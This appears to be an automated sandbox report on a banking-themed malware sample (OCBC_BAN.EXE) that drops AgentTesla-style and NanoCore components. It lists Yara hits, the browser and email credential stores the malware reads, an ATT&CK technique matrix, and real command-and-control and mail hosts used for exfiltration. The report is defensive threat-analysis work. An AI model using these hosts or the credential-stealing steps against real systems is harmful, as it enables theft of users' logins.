          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEQueries volume information: C:\Users\user\Desktop\OCBC_BAN.EXE VolumeInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPED
          Source: Yara matchFile source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604, type: MEMORYSTR
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: Yara matchFile source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPED
          Source: Yara matchFile source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604, type: MEMORYSTR
          Source: OCBC_BAN.EXE, 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: OCBC_BAN.EXE, 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          11
          Registry Run Keys / Startup Folder
          112
          Process Injection
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services11
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
          Registry Run Keys / Startup Folder
          1
          Deobfuscate/Decode Files or Information
          21
          Input Capture
          114
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Obfuscated Files or Information
          Security Account Manager1
          Query Registry
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
          Software Packing
          NTDS211
          Security Software Discovery
          Distributed Component Object Model21
          Input Capture
          Scheduled Transfer1
          Remote Access Software
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets2
          Process Discovery
          SSHKeyloggingData Transfer Size Limits2
          Non-Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common131
          Virtualization/Sandbox Evasion
          Cached Domain Credentials131
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 Channel112
          Application Layer Protocol
          Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items112
          Process Injection
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Hidden Files and Directories
          Proc Filesystem1
          Remote System Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 623417 Sample: OCBC_BAN.EXE Startdate: 10/05/2022 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 10 other signatures 2->47 7 OCBC_BAN.EXE 15 8 2->7         started        process3 dnsIp4 33 bmn.lpmpbanten.id 103.8.79.204, 49737, 80 IDNIC-MTN-AS-IDPTMediatamaTelematikaNusantaraID Indonesia 7->33 27 C:\Users\user\AppData\...\windscribe.exe, PE32 7->27 dropped 29 C:\Users\user\AppData\...\Pubrtkzyqpdcef1.exe, PE32 7->29 dropped 31 C:\Users\user\AppData\...\OCBC_BAN.EXE.log, ASCII 7->31 dropped 49 Creates an undocumented autostart registry key 7->49 51 Injects a PE file into a foreign processes 7->51 12 Pubrtkzyqpdcef1.exe 2 7->12         started        16 OCBC_BAN.EXE 6 7->16         started        19 cmd.exe 1 7->19         started        file5 signatures6 process7 dnsIp8 35 mx.mf.netgate.com.uy 200.40.119.50, 49786, 587 AdministracionNacionaldeTelecomunicacionesUY Uruguay 12->35 37 mail.elparque.com.uy 12->37 53 Antivirus detection for dropped file 12->53 55 Multi AV Scanner detection for dropped file 12->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->57 61 4 other signatures 12->61 39 23.105.131.196, 9070 LEASEWEB-USA-NYC-11US United States 16->39 25 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 16->25 dropped 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->59 21 conhost.exe 19->21         started        23 timeout.exe 1 19->23         started        file9 signatures10 process11

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          OCBC_BAN.EXE32%ReversingLabsWin32.Trojan.AgentTesla
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe100%AviraTR/Spy.Gen8
          C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe37%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe85%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe32%ReversingLabsWin32.Trojan.AgentTesla
          SourceDetectionScannerLabelLinkDownload
          9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack100%AviraHEUR/AGEN.1203035Download File
          9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack100%AviraHEUR/AGEN.1203035Download File
          12.0.OCBC_BAN.EXE.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack100%AviraHEUR/AGEN.1203035Download File
          9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack100%AviraHEUR/AGEN.1203035Download File
          12.2.OCBC_BAN.EXE.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          12.0.OCBC_BAN.EXE.400000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          12.0.OCBC_BAN.EXE.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          12.0.OCBC_BAN.EXE.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          12.2.OCBC_BAN.EXE.5ba0000.9.unpack100%AviraTR/NanoCore.fadteDownload File
          12.0.OCBC_BAN.EXE.400000.12.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack100%AviraHEUR/AGEN.1203035Download File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
